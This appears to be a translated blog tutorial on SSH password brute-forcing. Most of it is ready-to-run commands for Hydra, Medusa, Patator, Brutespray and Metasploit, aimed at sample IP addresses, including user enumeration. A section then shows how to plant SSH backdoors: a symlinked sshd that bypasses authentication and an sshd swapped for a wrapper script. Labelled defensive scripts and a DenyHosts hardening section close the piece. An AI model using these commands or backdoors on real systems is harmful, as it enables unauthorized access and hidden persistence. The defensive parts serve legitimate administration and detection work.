Mastering SSH Password Brute-Force: Tools, Techniques, and Defense Strategies

This comprehensive guide explains SSH remote management, details common brute‑force attack scenarios, and walks through the installation and practical usage of popular tools such as Hydra, Medusa, Patator, Brutespray, and Metasploit, while also providing effective defensive measures to protect Linux systems.

MaGe Linux Operations

SSH Password Brute-Force: Application Scenarios and Approach

SSH (Secure Shell) is a widely used secure protocol for remote login and other network services on Linux, Windows, and many UNIX platforms. It prevents information leakage during remote management. When no vulnerability is available, attackers may resort to brute‑forcing SSH credentials.

Typical scenarios:

(1) Gaining root via remote command execution (e.g., Struts).
(2) Privilege escalation through a webshell.
(3) Reading all local files via local file inclusion.
(4) Accessing internal hosts after obtaining network entry.
(5) Direct SSH access when the external SSH port is open.

In these scenarios, attackers often target the /etc/shadow file for password cracking, but when no exploitable vulnerability exists, they must brute‑force SSH accounts directly.

1. Using Hydra for SSH Password Brute-Force

1.1 Overview

Hydra, developed by the THC project, is a powerful online password‑cracking tool that supports almost all protocols. Its effectiveness depends on the strength of the password dictionary used.

1.2 Installation

Debian/Ubuntu

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev hydra

RedHat/Fedora

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

CentOS

# tar zxvf hydra-7.6-src.tar.gz
# cd hydra-7.6-src
# ./configure
# make
# make install

1.3 Using Hydra

Hydra is pre‑installed on Kali and BackTrack. It can be launched via the GUI or by running /usr/local/bin/hydra. Example command:

hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh

To save results:

hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh

[Figure: Hydra wizard interface]

If libssh support is missing, the following commands install it and recompile Hydra:

yum install cmake
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install

[Figure: Missing libssh error]

2. Using Medusa for SSH Brute-Force

2.1 Overview

Medusa is a fast, parallel, modular password‑cracking tool that supports many protocols. It is more stable than Hydra but supports fewer modules.

2.2 Installation

Git clone

git clone https://github.com/jmk-foofus/medusa.git
cd medusa
./configure
make
make install

2.3 Parameters

medusa -h host -u username -P password_file -M ssh -t threads -e ns -f

2.4 Example

medusa -M ssh -h 192.168.44.139 -u root -P pwd2.dic

[Figure: Medusa cracking result]

3. Using Patator for SSH Brute-Force

3.1 Installation

git clone https://github.com/lanjelot/patator.git
cd patator
python setup.py install

3.2 Usage

Run ./patator.py to view help. The ssh_login module is used for SSH.

./patator.py ssh_login host=192.168.157.131 user=root password=FILE0 0=/root/newpass.txt

[Figure: Patator multiple users]

4. Using Brutespray for SSH Brute-Force

4.1 Installation

Download from GitHub and install:

git clone https://github.com/x90skysn3k/brutespray.git
cd brutespray
pip install -r requirements.txt

4.2 Parameters

brutespray.py -f nmap.xml -u root -p toor --threads 5 --hosts 5

[Figure: Brutespray interactive mode]

5. Using Metasploit (MSF) for SSH Brute-Force

5.1 Modules

Search with search ssh to list available modules, such as auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_enumusers.

5.2 User Enumeration

use auxiliary/scanner/ssh/ssh_enumusers
set rhost 192.168.17.147
set USER_FILE /root/user
run

[Figure: MSF user enumeration]

5.3 Version Scanning

use auxiliary/scanner/ssh/ssh_version
set rhosts 192.168.157.147
run

[Figure: SSH version scan]

5.4 Password Brute-Force

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.157.147
set USER_FILE /root/user.txt
set PASS_FILE /root/pass.txt
run

[Figure: MSF cracking result]

6. SSH Backdoors

6.1 Soft‑link Backdoor

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=33223;

Connect with ssh root@target_ip -p 33223 to bypass authentication.

6.2 SSH Server Wrapper Backdoor

cd /usr/sbin
mv sshd ../bin
vi sshd   # insert Perl wrapper code
chmod 755 sshd
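
A defender-side check for the changes described in 6.1 and 6.2, as an added example that is not from the original article: it flags symlinks that resolve to the sshd binary and an sshd file that is a script rather than an ELF executable. The function names and the directory tree built in demo() are constructed for illustration; on a real host, pass the actual sshd path and the directories to search.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

def is_elf(path):
    """True if the file starts with the ELF magic; a script wrapper will not."""
    with open(path, "rb") as fh:
        return fh.read(4) == ELF_MAGIC

def find_sshd_links(sshd_path, roots):
    """Return symlinks under `roots` that resolve to the sshd binary."""
    target = os.path.realpath(sshd_path)
    hits = []
    for root in roots:
        # followlinks=False: report links, never descend through them
        for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) and os.path.realpath(path) == target:
                    hits.append(path)
    return sorted(hits)

def audit(sshd_path, roots):
    """Return (kind, path) findings: 'wrapper' for a non-ELF sshd, 'symlink' for links to it."""
    findings = []
    if not is_elf(sshd_path):
        findings.append(("wrapper", sshd_path))
    findings += [("symlink", p) for p in find_sshd_links(sshd_path, roots)]
    return findings

def demo():
    """Build a constructed directory tree and audit it (paths are sample data)."""
    with tempfile.TemporaryDirectory() as base:
        base = os.path.realpath(base)
        sbin, tmp = os.path.join(base, "sbin"), os.path.join(base, "tmp")
        os.makedirs(sbin)
        os.makedirs(tmp)
        sshd = os.path.join(sbin, "sshd")
        with open(sshd, "wb") as fh:
            fh.write(b"#!/usr/bin/perl\n")  # constructed: a script where an ELF binary belongs
        os.symlink(sshd, os.path.join(tmp, "su"))
        return [(kind, os.path.relpath(p, base)) for kind, p in audit(sshd, [tmp])]

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```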

6.3 Using socat

socat STDIO TCP4:target_ip:22,sourceport=19526

6.4 SSH Public‑Key Authentication

chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

7. SSH Brute‑Force Command Summary

All tools (Hydra, Medusa, Patator, Brutespray, MSF) can successfully crack SSH credentials. Hydra and Medusa are C‑based and require compilation; Patator and Brutespray are Python‑based. Brutespray leverages Nmap scan results. Use logging options (-o save.log, -O ssh.log, etc.) to record successful attempts.

8. SSH Brute‑Force Defense

Change the default SSH port in /etc/ssh/sshd_config.

Restrict allowed IPs via /etc/hosts.allow.

Deploy DenyHosts to block repeated failed attempts.

Installation of DenyHosts:

# tar -zxvf DenyHosts-2.6.tar.gz
# cd DenyHosts-2.6
# python setup.py install

Configure denyhosts.cfg (e.g., thresholds, log locations) and enable the service to start on boot.
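
The kind of check a DenyHosts-style blocker performs, as an added example that is not DenyHosts' own code or part of the original article: it counts failed sshd password logins per source address and emits hosts.deny lines for sources at or above a threshold. The log lines, the threshold value and the function names are constructed for illustration, and only IPv4 sources are handled.

```python
import re
from collections import Counter

# Constructed sample in the sshd format found in /var/log/secure or auth.log.
SAMPLE_LOG = """\
Mar  3 10:15:01 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 10:15:03 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar  3 10:15:06 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
Mar  3 10:15:09 web1 sshd[2105]: Failed password for invalid user x from 192.0.2.50 port 22 ssh2 from 203.0.113.7 port 40122 ssh2
Mar  3 10:16:40 web1 sshd[2110]: Failed password for deploy from 198.51.100.20 port 51000 ssh2
Mar  3 10:16:52 web1 sshd[2110]: Accepted password for deploy from 198.51.100.20 port 51002 ssh2
"""

# The user name is text chosen by the remote side, so the greedy (.*) plus the
# end-of-line anchor makes the *last* "from <ip> port <n> ssh2" the source address.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(.*) "
    r"from (\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2\s*$"
)

def failed_by_source(log_text):
    """Count failed password logins per source IPv4 address."""
    counts = Counter()
    for line in log_text.splitlines():
        match = FAILED.search(line)
        if match:
            counts[match.group(2)] += 1
    return counts

def deny_entries(log_text, threshold=3, allow=()):
    """Return hosts.deny lines for sources at or above the threshold."""
    counts = failed_by_source(log_text)
    return [f"sshd: {ip}" for ip, n in sorted(counts.items())
            if n >= threshold and ip not in allow]

if __name__ == "__main__":
    print(dict(failed_by_source(SAMPLE_LOG)))
    print("\n".join(deny_entries(SAMPLE_LOG)))
```

The fourth sample line carries an address inside the user name; anchoring on the end of the line keeps that address from being counted, so only the real source is blocked. hosts.allow and hosts.deny take effect only when sshd is built with TCP wrappers (libwrap) support, which upstream OpenSSH removed in version 6.7.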

By following these practices, administrators can significantly reduce the risk of successful SSH brute‑force attacks.
